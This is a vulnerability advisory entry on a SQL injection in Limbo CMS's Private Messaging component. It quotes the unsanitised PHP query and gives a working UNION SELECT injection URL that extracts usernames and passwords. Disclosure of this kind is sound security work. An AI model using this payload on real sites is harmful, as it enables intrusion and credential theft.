Limbo CMS (Private Messaging Component) SQL Injection Vulnerability

2009.02.08
Credit: StAkeR
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

/* Limbo CMS (Private Messaging Component) Remote SQL Injection Vulnerability -------------------------------------------------------------------------- StAkeR[at]hotmail[dot]it http://www.limboportal.com/index.php/option/downloads/task/download/id/108 -------------------------------------------------------------------------- com_privmsg/open.php 31. if (isset($_GET['status'])) 32. { 33. header('Location:index.php?option=pms&page=open&id='.$_GET['id'].''); 34. } 35. 36. $openrow= $conn->GetRow("SELECT * FROM #__pms WHERE id='$_GET[id]' AND username='$my->username'"); 37. - index.php?option=pms&page=open&id='1+union+all+select+password,username+from+[prefix_users]+where+id=1/* (Syntax Error) Change number of columns (Ex: 0,0,0,username,password) */

References:

http://xforce.iss.net/xforce/xfdb/45990
http://www.securityfocus.com/bid/31837
http://www.milw0rm.com/exploits/6796
http://www.frsirt.com/english/advisories/2008/2887


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top